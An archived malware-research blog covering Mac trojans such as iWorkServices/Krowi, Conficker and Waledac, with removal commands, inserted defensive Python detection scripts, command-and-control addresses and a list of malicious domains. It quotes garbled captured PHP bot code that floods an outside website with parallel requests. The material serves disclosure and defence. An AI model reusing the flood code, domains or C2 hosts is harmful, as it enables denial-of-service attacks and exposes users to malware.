Archive
Yahoo Account InSecurity
The video linked below shows how the author demonstrated a live, random user account being successfully penetrated (hacked) using a Yahoo cookie generator.
http://www.milw0rm.com/video/watch.php?id=84
Did someone hack into your Yahoo account? What’s your story?
Reference for reading:
http://ithreats.wordpress.com/2008/03/06/cookies-a-threat-to-your-privacy/
New Offer from Rogue “iMunizator”
Looks familiar? Yes, we saw this last January with “MacSweeper”, the first rogue on Mac. The authors tried to defend their application and fixed it, but the damage was already done. Months later, a rebranded version, “Imunizator”, came out. This week we’ve seen its update and its equally rogue “LifeTime” offers.


Latest OS X threat Krowi installs “DivX”
The latest update of the Krowi threat was found in an Adobe Photoshop cracker installer.
Not much difference from “iWorkServices” except for the repackaging and the name. However, this should serve as a reminder to be extra careful about what you download!


Once installed, you’ll find the files and port activity shown below.

How to Remove? It’s the same as the previous instructions, except that you have to change the name from “iWorkServices” to “DivX”.
How To Remove “iWorkServices”
I noticed that some of the traffic coming in is looking for how to remove “iWorkServices”.
So, here are the manual or “Do It Yourself” steps:
Open Terminal – > /Applications/Utilities/Terminal.app
1. Check if “iWorkServices” is running. To do so, you can choose any of the options below:
**Note: These commands require root privileges to execute. To avoid re-entering your password every time, type – > “sudo su”.
- Check for the “iworkservices” running process by typing “lsof -c iwork” or “lsof -c iWork”; use whichever one works for you.

While monitoring “iWorkServices” background activity, you will notice the TCP connections change as it tries to communicate with 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024.

1.1 If you know the PID (process ID), then typing “lsof -p <PID>” will give the same result.
2. Since we have already confirmed the presence of this threat on the system, you can start removing it by executing the following commands:
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
2.1 Or you can copy the same instructions into a small bash script, as in the example below:
#!/bin/bash
# Simple script to delete the iWorkServices files and terminate the running process.
# Run as root (sudo su), otherwise the rm and killall commands will fail.
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
exit
You can write these instructions in any text editor, such as TextEdit (/Applications/TextEdit.app).

Open Terminal and type “chmod +rwx <filename>” as in the example below. **Notice that I am the root user here, so don’t forget to type “sudo su” so your script executes properly.**
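The checks and removal steps above, gathered into one script as an added example (this is not the blog’s own script). It tests for the four file paths and the process name listed in the post, prints what it finds, and only deletes anything when run with --remove as root. Unlike the bash script above, it terminates the process before deleting the files so the binary cannot recreate them. The ps output in the comments is constructed; the paths and process name are the ones the post gives.

```python
import os
import shutil
import subprocess
import sys

# File paths the post lists for the iWorkServices/Krowi installer.
INDICATOR_PATHS = [
    "/System/Library/StartupItems/iWorkServices",
    "/usr/bin/iWorkServices",
    "/private/tmp/.iWorkServices",
    "/Library/Receipts/iWorkServices.pkg",
]
# The post's "lsof -c iwork" / "lsof -c iWork" hint shows the name's case varies,
# so we match a lower-cased substring of the command name.
PROCESS_NAME = "iworkservices"


def present_paths(paths=INDICATOR_PATHS):
    """Return the indicator paths that exist on this machine (symlinks included)."""
    return [p for p in paths if os.path.lexists(p)]


def matching_pids(ps_output, name=PROCESS_NAME):
    """Parse `ps -axo pid=,comm=` output and return PIDs whose command name
    contains `name`, case-insensitively. Kept pure so it can be run on
    captured output such as "  123 /usr/bin/iWorkServices" (constructed)."""
    pids = []
    for line in ps_output.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue
        pid, comm = parts
        if name in os.path.basename(comm).lower():
            pids.append(int(pid))
    return pids


def running_pids(name=PROCESS_NAME):
    """Run ps (the -axo form works on macOS and Linux) and return matching PIDs."""
    out = subprocess.run(["ps", "-axo", "pid=,comm="],
                         capture_output=True, text=True, check=False).stdout
    return matching_pids(out, name)


def remove(paths, pids):
    """Terminate the process first so it cannot recreate files, then delete.
    Requires root; mirrors the post's killall/rm steps."""
    for pid in pids:
        os.kill(pid, 9)
    for p in paths:
        if os.path.isdir(p) and not os.path.islink(p):
            shutil.rmtree(p)
        else:
            os.remove(p)


def main(argv):
    found = present_paths()
    pids = running_pids()
    for p in found:
        print("indicator file present:", p)
    for pid in pids:
        print("indicator process running, pid", pid)
    if not found and not pids:
        print("no iWorkServices indicators found")
        return 0
    if "--remove" not in argv:
        print("re-run with --remove (as root) to clean up")
        return 1
    if os.geteuid() != 0:
        print("removal requires root: run with sudo")
        return 2
    remove(found, pids)
    print("removed")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it once without arguments to see what is present; a non-zero exit code means indicators were found and not removed, which makes it usable from a fleet management tool as a simple detection check.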


Please feel free to drop a message, hopefully with additional information such as:
- How did you get infected? (website?)
- Do you still have a copy of the application you installed? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au, or just send me a link where I can download it.
- Any unusual behavior found on your computer.
Happy Holidays!!! –> As of writing, it is a nice sunny “Australian day” today and I still feel sleepy from watching the Australian Open last night. It was fun and an amazing crowd!
Update: “iWorkServices” Not Just A Trojan
Let’s call the bad iWork “Krowi”.
So, the story starts when an OS X user downloads an iWork 09 installation package with a serial key through BitTorrent.

Take note that Krowi is often found in a package “iWork09.zip” with a file size of 450.4MB. Upon extracting, you’ll find NO “iWorkServices” here; instead there is a main installation package named iWork09Trial.mpkg and an enticing serial.txt.
Upon inspecting the contents of “iWork09Trial.mpkg”, you’ll find the nasty Krowi “iWorkServices.pkg” piggybacking.

The file “preflight” contains a one-line instruction, which executes the Mach-O binary file “iworkservices”.
When installed, this will create the following files:
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
/usr/bin/iWorkServices
Since the system keeps a copy of the installer, you’ll find this as well:
/Library/Receipts/iWorkServices.pkg
Once installed, you will find the “iWorkServices” process running in the background, persistently attempting to report to its command and control channels:
69.92.177.146:59201
qwfojzlk.freehostia.com:1024
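The piggybacking package above is the interesting part: the trojan rides in a nested .pkg whose preflight script runs a Mach-O binary as root before the real installer does anything. As an added example (not the blog’s or any project’s own code), this script walks an already-unpacked package tree, lists every install-time script it finds at any depth, pulls out the paths each script invokes, and reports whether a file of that name inside the package carries a Mach-O magic number. The sample package tree it builds is constructed to mimic the layout the post describes; the one-line preflight content and the $1 package-path convention are assumptions, and the binary is only a 16-byte fat-header stub.

```python
import os
import re
import struct
import tempfile

# Script names the Apple installer runs with root privileges during install.
SCRIPT_NAMES = {"preflight", "preinstall", "postflight", "postinstall",
                "preupgrade", "postupgrade"}
# Absolute paths, ./relative paths, or $1/... (assumed: installer passes the package path as $1).
PATH_RE = re.compile(r'(?:\$\{?\d\}?/|\./|/)[\w./-]+')
# First four bytes of Mach-O files. 0xCAFEBABE is also the Java class magic, so treat it as a hint.
MACHO_MAGICS = {0xFEEDFACE: "Mach-O 32-bit", 0xFEEDFACF: "Mach-O 64-bit",
                0xCAFEBABE: "Mach-O universal (fat)"}


def find_install_scripts(root):
    """Return every install-time script under root, nested .pkg bundles included."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower() in SCRIPT_NAMES:
                hits.append(os.path.join(dirpath, f))
    return sorted(hits)


def invoked_paths(script_path):
    """Extract path-like tokens from a shell script, ignoring comments and the shebang."""
    with open(script_path, errors="replace") as fh:
        lines = fh.read().splitlines()
    paths = []
    for line in lines:
        line = line.split("#", 1)[0]
        paths.extend(PATH_RE.findall(line))
    return paths


def macho_kind(path):
    """Return a label if the file starts with a Mach-O magic number, else None."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    if len(head) < 4:
        return None
    big = struct.unpack(">I", head)[0]
    little = struct.unpack("<I", head)[0]
    return MACHO_MAGICS.get(big) or MACHO_MAGICS.get(little)


def audit(root):
    """Map each install script (relative to root) to the paths it invokes and,
    where a file of that basename exists inside the package, its Mach-O kind."""
    by_name = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            by_name.setdefault(f, []).append(os.path.join(dirpath, f))
    report = {}
    for script in find_install_scripts(root):
        entries = []
        for p in invoked_paths(script):
            kind = None
            for candidate in by_name.get(os.path.basename(p), []):
                kind = macho_kind(candidate) or kind
            entries.append((p, kind))
        report[os.path.relpath(script, root)] = entries
    return report


def build_sample_package(base):
    """Write a constructed package tree mimicking the post's layout: a trial .mpkg
    with a nested iWorkServices.pkg whose preflight launches a bundled binary."""
    res = os.path.join(base, "iWork09Trial.mpkg", "Contents", "Packages",
                       "iWorkServices.pkg", "Contents", "Resources")
    os.makedirs(res)
    with open(os.path.join(res, "preflight"), "w") as fh:
        fh.write("#!/bin/sh\n$1/Contents/Resources/iworkservices &\n")  # assumed content
    with open(os.path.join(res, "iworkservices"), "wb") as fh:
        fh.write(b"\xca\xfe\xba\xbe" + b"\x00" * 12)  # fat magic only, not a real binary


def demo():
    """Build the sample package in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_package(d)
        return audit(d)


if __name__ == "__main__":
    import sys
    result = audit(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for script, entries in result.items():
        print(script)
        for path, kind in entries:
            print("   runs:", path, "(" + (kind or "no Mach-O of that name in package") + ")")
```

Pass the path of an expanded package as the first argument to audit a real download; with no argument it audits the constructed sample. A legitimate trial installer has no reason to launch an unsigned universal binary from a preflight script, so any line in the report is worth reading before clicking Install.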

Krowi is a nasty P2P-controlled bot, similar to the known Storm Worm.
Infected OS X users’ machines can be controlled remotely by the bot master. They can be used to participate in a massive Distributed Denial of Service (DDoS) attack, install further applications (like software from Pay-per-Install), send spam, distribute malware and possibly gather user data.
Looking further, this malware comes with a Lua interpreter, which is described as a “powerful, fast, light-weight, embeddable scripting language”. This could further expand the attacker’s capability on the affected machine. An automated master could respond and push a PHP script …
Imagine, load and run!
++++++++++++++++
Update 24th Jan: I just want to link a few infection reports I found around the net that were able to capture PHP scripts running on their box:
http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190
php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)
Latest OS X Threat: “iWorkServices”
A new OS X threat disguised as the legitimate application iWork 09 is currently in the wild. A few OS X users have already been tricked by this, so be careful!
This malicious piece of code creates a startup entry and copies itself to /usr/bin/iWorkServices.


Once installed, it will attempt to communicate remotely and execute HTTP requests. It also creates /tmp/.iWorkServices with mode 755 (read and execute for everyone), which may relate to its P2P activity.
It also references “Users/jason/diarrhea/aes/aes_modes.c”.
Notice that this will also attempt to connect to this URL:

OK, so the culprit is in Mach-O universal binary format:

I know these details are not enough; for now I can say that this is indeed a threat: a backdoor, trojan and P2P-controlled bot.
**Updated: Note the file size that contains this threat is ~450MB**
By the way, this is currently being discussed here:
OS X Vulnerability In 2008
Here’s some information worth noting from Secunia.


Safari Vulnerability Could Expose Users Data
A severe, critical flaw in Safari was recently discovered, and NO patch has been released yet as of writing. Brian Mastenbrook discovered this vulnerability on 13th January and disclosed the following information: [Further reading]
————————————————————————————-
I have discovered that Apple’s Safari browser is vulnerable to an attack that allows a malicious web site to read files on a user’s hard drive without user intervention. This can be used to gain access to sensitive information stored on the user’s computer, such as emails, passwords, or cookies that could be used to gain access to the user’s accounts on some web sites. The vulnerability has been acknowledged by Apple.
All users of Mac OS X 10.5 Leopard who have not performed the workaround steps listed below are affected, regardless of whether they use any RSS feeds. Users of previous versions of Mac OS X are not affected.
Users of Firefox, Camino, and Opera on Mac OS X are substantially better protected against exploitation by a malicious web page than users of Safari or OmniWeb. If users of these browsers are asked to open a link in Safari, they should not allow the request and close the page which triggered the request immediately. All users of Mac OS X may still be affected by clicking on a malicious link from their email client, instant messaging program, or another application, and should perform the workaround steps given below.
————————————————————————————-
Good thing there were no technical details disclosed. For sure, nosy attackers would never let it slip without jumping on the opportunity.
Worm, Worm, Worm
Conficker.B is a worm that has been very busy lately and is still actively attacking systems and networks. This nasty threat propagates through network shares and removable drives (using autorun.inf), and exploits the MS08-067 vulnerability.
The infection sequence of this worm (once inside the network) is as follows:
1. Scans network shares such as IPC$ and ADMIN$ and browses through Active Directory, so it works hard to get into other machines in the network. Unfortunately, if you are using weak passwords, you are very vulnerable, since it uses a password dictionary attack.
2. It sends crafted packets exploiting the Windows Server Service via NetPathCanonicalize().
3. On any machine that responds to this attack, the worm transfers its file into the System32 directory: “\System32\<random filename>.dll”.
4. Using “NetAddScheduledJob”, it creates a scheduled job that executes its DLL file through the rundll32 command. Since the worm cannot check which machines are already infected, scheduled jobs continuously get created, flooding the machine with jobs as a result of its repeated successful attacks.
5. What’s difficult with this worm is that, when installed, it creates an Access Control Entry for the DLL file which limits users’ access rights on the file. As a result, the file is difficult for most security scanners to scan and delete.
6. Another problem: this worm is not an EXE but a DLL, and when running it injects itself into svchost.exe and thereafter into all running processes. It writes itself into different address spaces, making it a persistent memory resident, which means deleting the file doesn’t mean the worm will be terminated. As a consequence, the worm can still attack other machines and cause re-infection.
7. It disables or stops services, blocks access to a list of mostly security-related websites, and accesses pre-computed domain names (these are not hard-coded, so you can generate a list) from which this worm may attempt to download files.
Zarestel provided a good blog article and analysis. The decrypted packet clearly shows that an affected machine will turn into an attacker within the network. Take note of the packet activity shown in the screenshot and notice that you can monitor your network and check for SMB protocol, network share enumeration (\IPC$, \browser) and NetPathCanonicalize requests.
Also, a colleague at Microsoft, Jireh, created a good analysis as well.
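The monitoring advice above (watch for SMB share enumeration of IPC$ across the network and for NetPathCanonicalize requests) turned into detection logic, as an added example that is not from the post or the linked analyses. It reads a simplified connection log of the form “HH:MM:SS src dst dst_port kind detail”, flags any source that issues a NetPathCanonicalize request over port 445, and flags a source that connects to IPC$ on at least N distinct hosts within a short window, which is how the worm’s step 1 looks from the wire. The log format, the sample lines and the thresholds are all constructed assumptions; map them onto whatever your SMB sensor or Zeek logs actually emit.

```python
from collections import defaultdict

# Constructed sample log. 10.0.0.5 behaves like an infected host: it enumerates
# IPC$ on five different machines in three seconds, then sends the exploit
# request. 10.0.0.9 is an admin touching one host, and 10.0.0.12 is plain HTTP.
SAMPLE_LOG = r"""
10:00:01 10.0.0.5 10.0.0.21 445 tree_connect \\10.0.0.21\IPC$
10:00:01 10.0.0.5 10.0.0.22 445 tree_connect \\10.0.0.22\IPC$
10:00:02 10.0.0.5 10.0.0.23 445 tree_connect \\10.0.0.23\IPC$
10:00:02 10.0.0.5 10.0.0.24 445 tree_connect \\10.0.0.24\IPC$
10:00:03 10.0.0.5 10.0.0.25 445 tree_connect \\10.0.0.25\IPC$
10:00:03 10.0.0.5 10.0.0.25 445 srvsvc NetPathCanonicalize
10:00:05 10.0.0.9 10.0.0.40 445 tree_connect \\10.0.0.40\IPC$
10:00:07 10.0.0.9 10.0.0.40 445 tree_connect \\10.0.0.40\ADMIN$
10:00:09 10.0.0.12 10.0.0.50 80 http GET /
"""


def parse_events(text):
    """Turn log lines into dicts; malformed or blank lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        ts, src, dst, port, kind, detail = parts
        h, m, s = (int(x) for x in ts.split(":"))
        events.append({"t": h * 3600 + m * 60 + s, "src": src, "dst": dst,
                       "port": int(port), "kind": kind, "detail": detail})
    return events


def analyze(events, share_threshold=5, window_seconds=60):
    """Return {source: [reasons]} for sources showing the worm's network pattern."""
    findings = defaultdict(list)
    ipc_hits = defaultdict(list)  # src -> [(time, dst)] for IPC$ tree connects
    for e in events:
        if e["port"] != 445:
            continue
        # Step 2 of the sequence: the MS08-067 exploit path goes through this call.
        if "NetPathCanonicalize" in e["detail"]:
            findings[e["src"]].append(
                "NetPathCanonicalize request to %s (MS08-067 exploit path)" % e["dst"])
        # Step 1: share enumeration; a single IPC$ connect is normal, many hosts fast is not.
        if e["kind"] == "tree_connect" and e["detail"].upper().endswith("IPC$"):
            ipc_hits[e["src"]].append((e["t"], e["dst"]))
    for src, hits in ipc_hits.items():
        hits.sort()
        for t, _ in hits:
            recent = {d for (t2, d) in hits if t - window_seconds <= t2 <= t}
            if len(recent) >= share_threshold:
                findings[src].append("IPC$ enumeration against %d hosts within %ds"
                                     % (len(recent), window_seconds))
                break
    return dict(findings)


if __name__ == "__main__":
    for src, reasons in analyze(parse_events(SAMPLE_LOG)).items():
        print(src)
        for r in reasons:
            print("   ", r)
```

Tune share_threshold to your environment: backup agents and vulnerability scanners also touch IPC$ on many hosts, so whitelist those sources rather than raising the threshold until real infections slip under it. The NetPathCanonicalize check needs no tuning; on a patched network that call should be rare enough to investigate every time.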
Another worm, Waledac, sounds like wild-duck =) Yes, it is wild, being so active in sending us eCard.exe. Further reading: TrendMicro, CA, ThreatFire
ShadowServer published a latest list of active Waledac websites. Here’s a partial list: **Do NOT go to these sites unless you know how to handle malware.**
bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
eternalgreetingcard.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
greatmirabellasite.com
greetingcardcalendar.com
greetingcardgarb.com
greetingguide.com
greetingsupersite.com
Another mass-mailing worm spams email using legitimate images from Ikea, Hallmark and perhaps other sites. It targets IIS web servers and attempts to change the index file to a fake security alert disguised as a fix for MS09-067. What?!? Yes, MS09 (2009) … This worm has a sense of humor. Further reading here

